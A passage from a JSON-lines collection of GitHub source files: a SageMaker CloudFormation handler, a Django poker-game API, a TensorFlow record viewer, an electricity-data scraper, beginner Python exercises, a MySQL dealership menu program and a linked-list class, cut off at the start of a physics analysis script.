deleted too!\n raise NoStudioDomains(f\"No SageMaker Studio domain exists in this region!\")\n elif len(domain_ids) > 1:\n logging.warning(\n f\"Found {len(domain_ids)} Studio domains in this region: assuming first is target. {domain_ids}\"\n )\n return domain_ids[0]\n\n\ndef handle_create(event, context):\n logging.info(\"**Received create request\")\n domain_id = event[\"ResourceProperties\"].get(\"DomainId\")\n if domain_id is None:\n logging.info(\"Inferring domain ID\")\n domain_id = infer_domain_id()\n\n logging.info(f\"Querying domain {domain_id}\")\n desc = smclient.describe_domain(DomainId=domain_id)\n result = { k: desc[k] for k in desc.keys() if k in SUPPORTED_PROPS }\n cfnresponse.send(\n event,\n context,\n cfnresponse.SUCCESS,\n result,\n physicalResourceId=domain_id,\n )\n\n\ndef handle_delete(event, context):\n logging.info(\"**Received delete event\")\n logging.info(\"Descriptive resource - nothing to delete\")\n cfnresponse.send(\n event,\n context,\n cfnresponse.SUCCESS,\n {},\n physicalResourceId=event[\"PhysicalResourceId\"],\n )\n\n\ndef handle_update(event, context):\n \"\"\"Literally same process as create, for now - so as to always re-describe in case of changes\n \"\"\"\n logging.info(\"**Received update event\")\n domain_id = event[\"ResourceProperties\"].get(\"DomainId\")\n if domain_id is None:\n logging.info(\"Inferring domain ID\")\n domain_id = infer_domain_id()\n\n logging.info(f\"Querying domain {domain_id}\")\n desc = smclient.describe_domain(DomainId=domain_id)\n result = { k: desc[k] for k in desc.keys() if k in SUPPORTED_PROPS }\n cfnresponse.send(\n event,\n context,\n cfnresponse.SUCCESS,\n result,\n physicalResourceId=domain_id,\n )\n","repo_name":"apac-ml-tfc/intro-to-mlops","sub_path":".infrastructure/fn-describedomain/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5564871497","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom . import serializers\nfrom django.contrib.auth.models import User\nfrom game.models import Game\nfrom accounts.models import Profile\nfrom . import handler\nfrom django.contrib.auth import authenticate, login\nimport uuid\nfrom .models import Token\n\ndef random__hash():\n return uuid.uuid4().hex\n\n@api_view(['GET'])\ndef index(request):\n f = open('api_methods.txt')\n file = f.read().split('\\n')\n f.close()\n obj = {'info': file}\n return Response(obj)\n\n@api_view(['GET'])\ndef list_users(request):\n users = User.objects.all()\n serializer = serializers.UserSerializer(users, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef list_games(request):\n queryset = Game.objects.all()\n serializer = serializers.GameSerializer(queryset, many=True)\n return Response(serializer.data)\n\n####\n###########TOKENS\n####\n\n@api_view(['POST'])\ndef get_new_token(request):\n username = request.data.get('username')\n password = request.data.get('password')\n print('username:',username,'password:',password)\n user = authenticate(request,username=username, password=password)\n if not user:\n return Response({'error': 2, 'message': 'invalid credential'})\n #login(request, user)\n token = Token.objects.create(user=user,hash=random__hash(),scope=1)\n obj = {\n 'username': user.username,\n 'token': token.hash\n }\n return Response(obj)\n\n@api_view(['GET'])\ndef delete_token(request,pk):\n try:\n token = Token.objects.get(hash__exact = pk)\n token.delete()\n except:\n return Response({'error_code': 1,'message':'invalid token'})\n\n@api_view(['GET'])\ndef token_status(request,pk):\n try:\n token = Token.objects.get(hash__exact = pk)\n except:\n return Response({'error_code': 1, 'message': 'invalid token'})\n return Response({'success':'token is active','owner':token.user.username})\n\n@api_view(['POST'])\ndef token_list(request):\n username = request.data.get('username')\n passw = request.data.get('password')\n u = authenticate(request,username=username, password=passw)\n if not u:\n return Response('Not Authenticated')\n user_tokens = []\n for token in Token.objects.all():\n if token.user.username == u.username:\n user_tokens.append(token.hash)\n # todo: Если у него вообще нет токенов\n answer = {'success': 'Token got', 'tokens': user_tokens}\n return Response(answer)\n\n#####\n################## IN-GAME\n#####\n\n@api_view(['GET'])\ndef game_by_id(request,id):\n game = Game.objects.get(id=id)\n serializer = serializers.GameSerializer(game)\n game_obj = handler.read_game(id)\n new_players = []\n for player_json in game_obj['players']:\n new_player_obj = User.objects.get(username__exact = player_json['username'])\n serializer2 = serializers.UserSerializer(new_player_obj)\n new_players.append(serializer2.data)\n game_obj['players'] = new_players\n return Response(game_obj)\n\n@api_view(['POST'])\ndef create_game(request):\n try: \n user_token = request.data.get('token')\n except:\n return Response({\"error_code\":3,'message':'Token required'})\n try:\n token = Token.objects.get(hash__exact = user_token)\n except:\n return Response({'error_code': 1,'message': 'Invalid token'}) \n \n owner = User.objects.get(id = token.user.id)\n game = Game.objects.create(game_owner=owner.id,players=owner.username)\n in_game_players = []\n for player_name in list(game.players.split(\" \")):\n player = User.objects.get(username__exact = player_name)\n p = serializers.UserSerializer(player)\n in_game_players.append(p.data)\n jsong_obj = {\n 'PokerFold: Game': \"version 0.01\",\n 'id':game.id,\n 'status':game.status,\n 'owner':game.game_owner,\n 'players': in_game_players,\n }\n handler.write_game(game.id,jsong_obj)\n return Response({'success':'game created', 'game_id':game.id,'game_owner': game.game_owner})\n\n@api_view(['POST'])\ndef join_the_game(request):\n try:\n game = Game.objects.get(id = request.data.get('gameid'))\n except:\n return Response({'error_code':4,'message': 'That game never existed','requested_game':request.data.get('gameid')})\n \n # todo: Проверка на переполненную игру\n try:\n user_token = request.data.get('token')\n except:\n return Response({'error_code': 3, 'message': 'Token required'})\n \n try:\n token = Token.objects.get(hash = user_token)\n except:\n return Response({'error_code':1, 'message':'invalid token'})\n\n game_file = handler.read_game(request.data.get('gameid'))\n new_player_obj = User.objects.get(id = token.user.id)\n serializer2 = serializers.UserSerializer(new_player_obj)\n # todo: Проверку на то, что он уже в игре\n game_file['players'].append(serializer2.data)\n handler.write_game(request.data.get('gameid'),game_file)\n return Response({'success':'u r in da game'})\n\n@api_view(['POST'])\ndef leave_the_game(request):\n try:\n game = Game.objects.get(id = request.data.get('gameid'))\n except:\n return Response({'error_code':4,'message': 'That game never existed','requested_game':request.data.get('gameid')})\n\n try:\n user_token = request.data.get('token')\n except:\n return Response({'error_code': 3, 'message': 'Token required'})\n\n try:\n token = Token.objects.get(hash = user_token)\n except:\n return Response({'error_code':1, 'message':'invalid token'})\n\n game_file = handler.read_game(request.data.get('gameid'))\n username = User.objects.get(id = token.user.id).username\n #serializer2 = serializers.UserSerializer(new_player_obj)\n # todo: Проверку на то, что он уже не был в игре\n for i in range(len(game_file['players'])):\n if game_file['players'][i]['username'] == username:\n game_file['players'].pop(i)\n break\n handler.write_game(request.data.get('gameid'),game_file)\n return Response({'success':'u r leaved da game'})\n","repo_name":"Icawi/PokerFold","sub_path":"api/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18089567981","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nimport drone_tfrecords as tfr\nimport drone_input\n\nBATCH_SIZE = 100 # read how many tfrecords per batch\nMAX_STEPS = 3 # display how many batches\nDISPLAY_PER_BATCH = 2 # display images per batch\nNEW_IMAGE_SIZE = 101 # for viewing resized images\n\n\ndef check_tfrs(data_dir, max_steps, batch_size, type):\n with tf.Session() as sess:\n images, heights, widths, depths, label_ids, label_txts, filenames = drone_input.input_pipeline(\n data_dir, batch_size, type, transform=None)\n\n coord = tf.train.Coordinator()\n # Note: QueueRunner created in drone_input.py\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n try:\n step = 0\n while step < max_steps and not coord.should_stop():\n images_r, heights_r, widths_r, depths_r, label_ids_r, label_txts_r, filenames_r = sess.run(\n [\n images, heights, widths, depths, label_ids, label_txts,\n filenames\n ])\n\n anchor = BATCH_SIZE // DISPLAY_PER_BATCH\n for i in range(len(images_r)):\n if (i + 1) % anchor == 0:\n print('height: %d, width: %d, depth: %d' %\n (heights_r[i], widths_r[i], depths_r[i]))\n print('label_id: %s, label_txt: %s, filename: %s' %\n (label_ids_r[i], label_txts_r[i], filenames_r[i]))\n print('label: %d' % (np.argmax(label_ids_r[i])) ) \n #print(images_r[i].size)\n img = images_r[i].reshape(\n [heights_r[i], widths_r[i], depths_r[i]])\n plt.imshow(np.around(img).astype(np.uint8))\n plt.show()\n\n if (heights_r[i] != NEW_IMAGE_SIZE or widths_r[i] != NEW_IMAGE_SIZE):\n re_image = tf.image.resize_images(images_r[i].reshape(\n [heights_r[i], widths_r[i], depths_r[i]]),\n NEW_IMAGE_SIZE, NEW_IMAGE_SIZE)\n img2 = sess.run(re_image)\n plt.imshow(np.around(img2).astype(np.uint8))\n plt.show()\n step += 1\n\n except tf.errors.OutOfRangeError:\n print('Done check for %d samples' % (step * BATCH_SIZE))\n\n finally:\n # When done, ask the threads to stop\n coord.request_stop()\n\n coord.join(threads)\n\n\ndef run():\n tfr_dir = os.path.join(os.getcwd(), 'drone_data', 'tfrecord')\n print('Check training set: ')\n check_tfrs(tfr_dir, MAX_STEPS, BATCH_SIZE, drone_input.DataTypes.train)\n print('Check validation set: ')\n check_tfrs(tfr_dir, MAX_STEPS, BATCH_SIZE,\n drone_input.DataTypes.validation)\n print('Check testing set: ')\n check_tfrs(tfr_dir, MAX_STEPS, BATCH_SIZE, drone_input.DataTypes.test)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"winston-li/tensorflow_playground","sub_path":"python/drone/display_tfrecords.py","file_name":"display_tfrecords.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69811573585","text":"# -*- coding:utf-8 -*-\n'''\n求1-N之间所有整数中1出现的次数之和\n'''\nclass Solution:\n def NumberOf1Between1AndN_Solution(self, n):\n # write code here\n return countOne(str(n))\ndef countOne(n):\n if int(n) == 0:\n return 0\n if len(n) == 1:\n return 1\n res = count(n)\n return res + countOne(n[1:])\n\ndef count(n):\n h = int(n[0])\n tail = int(n[1:])\n l = len(n)\n if h ==1:\n oh = tail+1\n else:\n oh = 10**(l-1)\n ot = h*(l-1)*10**(l-2)\n return oh + ot\n","repo_name":"lanpartis/jianzhiOffer_practice","sub_path":"31_numberOf1Between1AndN.py","file_name":"31_numberOf1Between1AndN.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36022210742","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom urllib.request import Request, urlopen # Python 3\n\ndef read_kansai_csv():\n combined_data = pd.DataFrame()\n for year in range(2016, datetime.now().year + 1):\n # Bypass 403 Forbidden error\n req = Request('https://www.kansai-td.co.jp/denkiyoho/csv/area_jyukyu_jisseki_' +\n str(year) + '.csv')\n req.add_header('User-Agent', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0')\n content = urlopen(req)\n\n csv = pd.read_csv(content, header = 1, encoding = 'shift_jis')\n\n # Combine multi-year CSVs into one dataframe\n combined_data = combined_data.append(csv, ignore_index=True)\n\n # Drop NaN columns\n combined_data.drop(combined_data.iloc[:, 13:], axis=1, inplace=True)\n\n # Translate Japanese column names to English\n combined_data.columns = ['Date_Time', 'Area_Demand', 'Nuclear', 'Thermal',\n 'Hydraulic', 'Geothermal', 'Biomass', 'Solar(Actual)',\n 'Solar(Output_Control)', 'Wind(Actual)', 'Wind(Output_Control)',\n 'Pumped_Hydro', 'Interconnector']\n\n # assign units and region\n combined_data['Region'] = 'Kansai'\n combined_data['Unit'] = 'MWh'\n\n # Format the datetime\n combined_data['Date_Time']=pd.to_datetime(combined_data['Date_Time'], format='%Y/%m/%d %H:%M')\n\n # get demand data into one df\n demand_df = combined_data[['Date_Time', 'Region', 'Unit', 'Area_Demand']].copy()\n demand_df.sort_values(by=['Date_Time'],ascending=False, inplace=True)\n # Drop NaN rows (not sure why there are NaN rows...)\n demand_df.dropna(inplace = True)\n\n # get supply data into another df\n supply_df = combined_data\n supply_df.drop('Area_Demand', axis=1, inplace=True)\n # Pivot \"wide\" to \"long\" format\n supply_df = pd.melt(combined_data, id_vars=['Date_Time','Region', 'Unit'], var_name='Fuel_Type', value_name='Supply')\n supply_df.sort_values(by=['Date_Time','Fuel_Type'], ascending=False, inplace=True)\n # Drop NaN rows (not sure why there are NaN rows...)\n supply_df.dropna(inplace = True)\n\n return demand_df, supply_df\n\nif __name__ == '__main__':\n demand_df, supply_df = read_kansai_csv()\n# demand_df\n# supply_df\n ","repo_name":"kellyzwang/Grid-Emissions-Data-Scraper-Japan-Vietnam","sub_path":"data_scrapers/japan_kansai/japan_kansai.py","file_name":"japan_kansai.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31156073434","text":"'''\r\n#1.check whether a number is prime number or not a prime number\r\nx=int(input(\"enter the value of x:\"))\r\nfor i in range(2,x):\r\n if (x%i==0):\r\n print(x,\"is a not prime number\")\r\n break\r\nelse:\r\n print(x,\"is a prime number\")\r\n\r\n#2.check whether a number is prime number or not in a given interval\r\nx=int(input(\"enter the value of x:\"))\r\ny=int(input(\"enter the value of y:\"))\r\nu=[]\r\nv=[]\r\nfor i in range(x,y+1):\r\n if i>1:\r\n for j in range(2,i):\r\n if(i%j)==0:\r\n #print(i,\"is not a prime number\")\r\n u.append(i)\r\n\r\n break\r\n else:\r\n v.append(i)\r\n #print(i,\"is a prime number\")\r\nprint(\"List of Non Prime Numbers:\", u)\r\nprint(\"Number of Non Prime Numbers:\", len(u))\r\nprint(\"List of Prime Numbers:\", v)\r\nprint(\"Number of Non Prime Numbers:\", len(v))\r\n\r\n#3.check whether a number is Armstrong or not\r\nx=int(input(\"enter the value of x:\"))\r\nsum=0\r\nnum=x\r\nwhile x>0:\r\n di=x%10\r\n sum=sum+(di*di*di)\r\n x=x//10\r\nif sum==num:\r\n print(\"x is Armstrong number\")\r\nelse:\r\n print(\"x is not Armstrong number\")\r\n\r\n#4.check whether a number is Armstrong in a given interval\r\n\r\na=int(input(\"enter the value of x:\"))\r\nb=int(input(\"enter the value of y:\"))\r\n\r\nc=[]\r\nfor num in range(a,b+1):\r\n a=num\r\n sum=0\r\n while num>0: \r\n di=num%10\r\n sum=sum+(di*di*di)\r\n num=num//10\r\n if (sum==a):\r\n c.append(a)\r\nprint(c)\r\n\r\n#5.find sum of digits of a given number\r\nx=int(input(\"enter the value:\"))\r\n\r\nsum=0\r\nwhile x>0:\r\n di=x%10\r\n sum=sum+di\r\n x=x//10\r\nprint(sum)\r\n'''\r\n#6.product of digits\r\nx=int(input(\"enter the value:\"))\r\n\r\npro=1\r\nwhile x>0:\r\n di=x%10\r\n pro=pro*di\r\n x=x//10\r\nprint(pro)\r\n'''\r\nx=[2,-2,3,-3,8,-8,2]\r\nv=[]\r\nu=[]\r\nfor i in x:\r\n if i>=0:\r\n v.append(i)\r\n\r\n else:\r\n u.append(i)\r\n#print(v)\r\n#print(u)\r\n#z=sum(v)\r\n#print(z)\r\nz1=sum(u)\r\nc=abs(z1)\r\n#print(c)\r\nif z==c:\r\n print(\"equal\")\r\nelse:\r\n print(\"not equal\")\r\n\r\n\r\nx=int(input(\"enter the value of x:\"))\r\ny=int(input(\"enter the value of y:\"))\r\nfor i in range(x,y):\r\n if i%3==0 and i%5==0:\r\n print(i, \"fizz buzz\")\r\n #continue\r\n elif i%3==0:\r\n print(i, \"fizz\")\r\n #continue\r\n elif i%5==0:\r\n print(i, \"buzz\")\r\n #continue\r\n else:\r\n print(i, \"na\")\r\n\r\n\r\n\r\nx=[2,3,4,5,6,7,10,4,10,3,5,6,7,7,8,9,1,2,3,4,5]\r\nu=[]\r\nv=[]\r\nfor i in x:\r\n if i%2==0:\r\n u.append(i)\r\n else:\r\n v.append(i)\r\nprint(u)\r\nprint(v)\r\ns=sum(u)\r\nprint(s)\r\nf=sum(v)\r\nprint(f)\r\nif u==v:\r\n print(\"equal\")\r\nelse:\r\n print(\"not equal\")\r\n \r\nx=int(input(\"enter the value:\"))\r\nfact=1\r\nfor i in range(1,x+1):\r\n fact=fact*i\r\nprint(fact)\r\n\r\n \r\nx=int(input(\"enter the value:\"))\r\nfact=1\r\ni=1\r\nwhile i>fact:\r\n fact=fact*i\r\n i=i+1\r\nprint(fact)\r\n'''\r\n","repo_name":"Sathya2020/Python_Coding","sub_path":"Apr_17.py","file_name":"Apr_17.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34884429574","text":"import mysql.connector\nfrom mysql.connector import errorcode\nimport sys, os\n\ncnx = mysql.connector.connect(user='root', password ='root', \n unix_socket=('/Applications/MAMP/tmp/mysql/mysql.sock'))\n\nDB_NAME = 'dealershipDB'\n\ncursor = cnx.cursor()\n\n#Creates the database, will print error if failed\ndef create_database(cursor, DB_NAME):\n try:\n cursor.execute(\"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(DB_NAME))\n except mysql.connector.Error as err:\n print (\"Failed creating database: {}\".format(err))\n exit(1)\n\n#Creates the table for brands.\ndef create_table_brands(cursor):\n create_brands = \"CREATE TABLE `brands` (\" \\\n \" `name` varchar(64) NOT NULL,\" \\\n \" `country` varchar(64),\" \\\n \" `parent_co` varchar(64),\" \\\n \" `ceo` varchar(64),\" \\\n \" PRIMARY KEY (`name`)\" \\\n \") ENGINE = InnoDB\"\n \n try:\n print(\"Creating table brands: \")\n cursor.execute(create_brands)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n#Creates the table for cars. \ndef create_table_cars(cursor):\n create_cars = \"CREATE TABLE `cars` (\" \\\n \" `car_id` varchar(64) NOT NULL,\" \\\n \" `brand` varchar(64),\" \\\n \" `model` varchar(64),\" \\\n \" `year` SMALLINT,\" \\\n \" PRIMARY KEY (`car_id`),\" \\\n \" FOREIGN KEY (`brand`) REFERENCES brands(name)\" \\\n \") ENGINE = InnoDB\"\n \n try:\n print(\"Creating table cars: \")\n cursor.execute(create_cars)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n#Creates the table for listings. \ndef create_table_listings(cursor):\n create_listings = \"CREATE TABLE `listings` (\" \\\n \" `vin_nr` varchar(64) NOT NULL,\" \\\n \" `car_id` varchar(64),\" \\\n \" `color` varchar(64),\" \\\n \" `miles` INT,\" \\\n \" `price` INT,\" \\\n \" PRIMARY KEY (`vin_nr`),\" \\\n \" FOREIGN KEY (`car_id`) REFERENCES cars(car_id)\" \\\n \") ENGINE = InnoDB\"\n \n try:\n print(\"Creating table listings: \")\n cursor.execute(create_listings)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n#Inserts the data from the file brands.csv into the table brands. You will need to to change\n#the LOAD DATA INFILE 'directory' to match the directory of your 'brands.csv'.\n#furthermore if you have trouble with secure_file_priv you will need to disable this in your mysql config.\ndef insert_into_brands(cursor):\n insert_sql = \"LOAD DATA INFILE '/Users/lk8562peterdahlberg/Desktop/python_courses/1DV503/data/brands.csv' \"\\\n \"INTO TABLE brands \"\\\n \"FIELDS TERMINATED BY ';' \"\\\n \"ENCLOSED BY '\\\"' \"\\\n \"LINES TERMINATED BY '\\n' \"\\\n \"IGNORE 1 ROWS \"\\\n\n try:\n print(\"Inserting data into brands:\")\n cursor.execute(insert_sql)\n except mysql.connector.Error as err:\n print(err.msg)\n else:\n cnx.commit()\n print(\"OK\")\n\n#Inserts the data from the file cars.csv into the table cars. You will need to to change\n#the LOAD DATA INFILE 'directory' to match the directory of your 'cars.csv'.\n#furthermore if you have trouble with secure_file_priv you will need to disable this in your mysql config.\ndef insert_into_cars(cursor):\n insert_sql = \"LOAD DATA INFILE '/Users/lk8562peterdahlberg/Desktop/python_courses/1DV503/data/cars.csv' \"\\\n \"INTO TABLE cars \"\\\n \"FIELDS TERMINATED BY ';' \"\\\n \"ENCLOSED BY '\\\"' \"\\\n \"LINES TERMINATED BY '\\n' \"\\\n \"IGNORE 1 ROWS \"\\\n\n try:\n print(\"Inserting data into cars:\")\n cursor.execute(insert_sql)\n except mysql.connector.Error as err:\n print(err.msg)\n else:\n cnx.commit()\n print(\"OK\")\n\n#Inserts the data from listings.csv into the table listings. You will need to to change\n#the LOAD DATA INFILE 'directory' to match the directory of your 'listings.csv'.\n#furthermore if you have trouble with secure_file_priv you will need to disable this in your mysql config.\ndef insert_into_listings(cursor):\n insert_sql = \"LOAD DATA INFILE '/Users/lk8562peterdahlberg/Desktop/python_courses/1DV503/data/listings.csv' \"\\\n \"INTO TABLE listings \"\\\n \"FIELDS TERMINATED BY ';' \"\\\n \"ENCLOSED BY '\\\"' \"\\\n \"LINES TERMINATED BY '\\n' \"\\\n \"IGNORE 1 ROWS \"\\\n\n try:\n print(\"Inserting data into listings:\")\n cursor.execute(insert_sql)\n except mysql.connector.Error as err:\n print(err.msg)\n else:\n cnx.commit()\n print(\"OK\")\n\ntry:\n cursor.execute(\"USE {}\".format(DB_NAME)) #USE dealershipDB\nexcept mysql.connector.Error as err:\n print(\"Database {} does not exist.\".format(DB_NAME))\n if err.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor, DB_NAME)\n print(\"Database {} successfully created.\".format(DB_NAME))\n cnx.database = DB_NAME\n create_table_brands(cursor)\n create_table_cars(cursor)\n create_table_listings(cursor)\n insert_into_brands(cursor)\n insert_into_cars(cursor)\n insert_into_listings(cursor)\n else:\n print(err)\n\n#Below is the code for all of the queries depending on the option chosen from the main menu.\ndef query_1(cursor):\n query1_1 = \"CREATE VIEW listings_info AS SELECT\"\\\n \" cars.brand, cars.model, cars.year, listings.color, listings.miles, listings.price\"\\\n \" FROM listings INNER JOIN cars ON listings.car_id=cars.car_id\"\\\n\n query1_2 = \"SELECT * FROM listings_info\"\n \n #Creates the view if not already created\n try:\n cursor.execute(query1_1)\n except Exception:\n pass\n\n cursor.execute(query1_2)\n\n results = cursor.fetchall()\n for row in results:\n print(row[0], row[1], row[2], \",\", row[3], \",\", row[4], \"miles,\", row[5], \"$\")\n\n\ndef query_2(cursor, answer_color):\n query2 = \"SELECT cars.brand, cars.model, cars.year FROM cars, listings\"\\\n \" WHERE listings.car_id=cars.car_id AND listings.color=%s\"\n cursor.execute(query2, (answer_color,))\n results = cursor.fetchall()\n if results:\n for row in results:\n print(row[0], row[1], row[2])\n else:\n print(\"No vehicle has that color.\")\n\ndef query_3(cursor):\n query3 = \"SELECT AVG(price) FROM listings\"\n cursor.execute(query3)\n results = cursor.fetchall()\n for row in results:\n print(\"The average price of a car is:\", row[0], \"$\")\n \ndef query_4(cursor, answer_country):\n query4 = \"SELECT cars.brand, cars.model, cars.year FROM brands, cars, listings\"\\\n \" WHERE listings.car_id=cars.car_id AND cars.brand=brands.name\"\\\n \" AND brands.country =%s\"\n cursor.execute(query4, (answer_country,))\n results = cursor.fetchall()\n if results:\n for row in results:\n print(row[0], row[1], row[2])\n else:\n print(\"No cars from that country.\")\n\ndef query_5(cursor):\n query5 = \"SELECT cars.brand, COUNT(listings.vin_nr) FROM listings, cars\"\\\n \" WHERE listings.car_id=cars.car_id GROUP BY cars.brand\"\n cursor.execute(query5)\n results = cursor.fetchall()\n for row in results:\n print(row[0], \":\", row[1])\n\n\n#Main menu\ndef main_menu():\n print(\"------------------------\")\n print(\"1. Show full info on all listings.\")\n print(\"2. Search for what cars are available in a certain color.\")\n print(\"3. Show average price of a car being sold.\")\n print(\"4. Search for what cars are available from a certain brand country.\")\n print(\"5. Search for how many cars are available from each brand.\")\n print(\"Q. Quit.\")\n print(\"------------------------\")\n print(\"Please choose an option:\")\n answer = str(input())\n return answer\n\n#Function that waits for a user to press a key, this is cross platform,\n#though I have only tested it with macOS as that's what I'm using.\n#This can also be achieved with curses (though I don't know if it's cross platform).\ndef wait():\n key_press = None\n if os.name == 'nt':\n import msvcrt\n key_press = msvcrt.getch()\n else:\n import termios\n fd = sys.stdin.fileno()\n\n oldterm = termios.tcgetattr(fd)\n newattr = termios.tcgetattr(fd)\n newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO\n termios.tcsetattr(fd, termios.TCSANOW, newattr)\n\n try:\n key_press = sys.stdin.read(1)\n except IOError:\n pass\n finally:\n termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)\n return key_press\n\n\n\n#All the different options, choosing quit will simply stop the while loop.\ndef answer_1():\n query_1(cursor)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_2():\n print(\"Enter the color:\")\n answer_color = input()\n query_2(cursor, answer_color)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_3():\n query_3(cursor)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_4():\n print(\"Enter the country:\")\n answer_country = input()\n query_4(cursor, answer_country)\n print(\"Press any key to return to main menu:\")\n wait()\n\ndef answer_5():\n query_5(cursor)\n print(\"Press any key to return to main menu:\")\n wait()\n\nwhile True:\n answer = main_menu()\n\n if answer == \"1\":\n answer_1()\n\n elif answer == \"2\":\n answer_2()\n\n elif answer == \"3\":\n answer_3()\n\n elif answer == \"4\":\n answer_4()\n\n elif answer == \"5\":\n answer_5()\n\n elif answer == \"Q\" or answer == \"q\":\n print(\"Quitting.\")\n break","repo_name":"pd222ha/1DV503-Programming-assignment-2","sub_path":"PA2.py","file_name":"PA2.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39626579395","text":"class SinglyNode:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert_at_head(self, d):\n x = SinglyNode(d)\n\n if self.head is None:\n self.head = x\n else:\n x.next = self.head\n self.head = x\n\n def insert_at_tail(self, d):\n tr = self.head\n while tr.next is not None:\n tr = tr.next\n tr.next = SinglyNode(d)\n\n def is_empty(self):\n return self.head is None\n\n def print_all(self):\n while self.head is not None:\n print(self.head.data)\n self.head = self.head.next\n\n def print_all(self, tr):\n while tr is not None:\n print(tr.data)\n tr = tr.next\n\n def reverse_using_recusrion(self, h):\n if h.next is None:\n return h\n r = None\n r = self.reverse_using_recusrion(h.next)\n h.next.next = h\n h.next = None\n return r\n\n def reverse_using_loop(self, h):\n prev = None\n nxt = None\n\n while h is not None:\n nxt = h.next\n h.next = prev\n prev = h\n h = nxt\n return prev\n\n def remove_without_head_brute_force(self, h):\n tr = h\n while (tr.next is not None):\n tr.data = tr.next.data\n tr = tr.next\n while (h.next != tr):\n h = h.next\n h.next = None\n\n def delete_without_head_simple(self, h):\n if h is None or h.next is None:\n return None\n x = h.next.next\n h.data = h.next.data\n h.next = x\n\n\ndef remove_loop(h):\n slow = h\n fast = h\n tr = h\n\n while fast.next is not None:\n\n fast = fast.next\n if fast is None:\n break\n fast = fast.next\n slow = slow.next\n if fast == slow:\n break\n\n while slow.next != tr.next:\n tr = tr.next\n slow = slow.next\n\n slow.next = None\n return h\n\n\n\n","repo_name":"biswarup2444/python_dsa","sub_path":"datastructures/linkedlist/singly/singly_node.py","file_name":"singly_node.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34134949923","text":"class Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n dit = {} #将列表转为字典\n nums.sort() #将列表排序\n for i in nums: #计算列表元素数量\n dit[i] = dit.get(i,0)+1\n dit = sorted(dit.items(), key=lambda dit:dit[1], reverse=True) #排序列表元素\n res = []\n for x in range(k):\n res.append(dit[x][0])\n return res\n","repo_name":"dgtyuewq/leetcode","sub_path":"解答/前 K 个高频元素.py","file_name":"前 K 个高频元素.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32354156397","text":"import os\nimport pathlib\nimport platform\n\nROOT_PATH = str(pathlib.Path(os.path.dirname(os.path.realpath(__file__))).parent)\nCURRENT_EXPERIMENT = 'bigsarima'\nRUNNING_LOCALLY = 'macOS' in platform.platform()\n\nif RUNNING_LOCALLY:\n OUTPUT_DIR = os.path.join(ROOT_PATH,'localoutput',CURRENT_EXPERIMENT,'output')\nelse:\n OUTPUT_DIR = '/cnvrg/output'\n\n\nif __name__=='__main__':\n print(platform.platform())\n print({'RUNNING_LOCALLY':RUNNING_LOCALLY,'OUTPUT_DIR':OUTPUT_DIR})\n\n\n","repo_name":"microprediction/schooled","sub_path":"schooled/whereami.py","file_name":"whereami.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20231310937","text":"from glob import glob\nimport uproot3\nimport numpy as np\nimport pandas as pd\nimport tqdm\nfrom RooPandasFunctions import PNanotoDataFrame,PSequential,PColumn,PFilter,PRow,PProcessor,PProcRunner,PInitDir\nfrom collections import OrderedDict\n\n#Define Datasets and corresponding file selections\nfnames={}\n#fnames[\"QCD_HT1000to1500\"] = 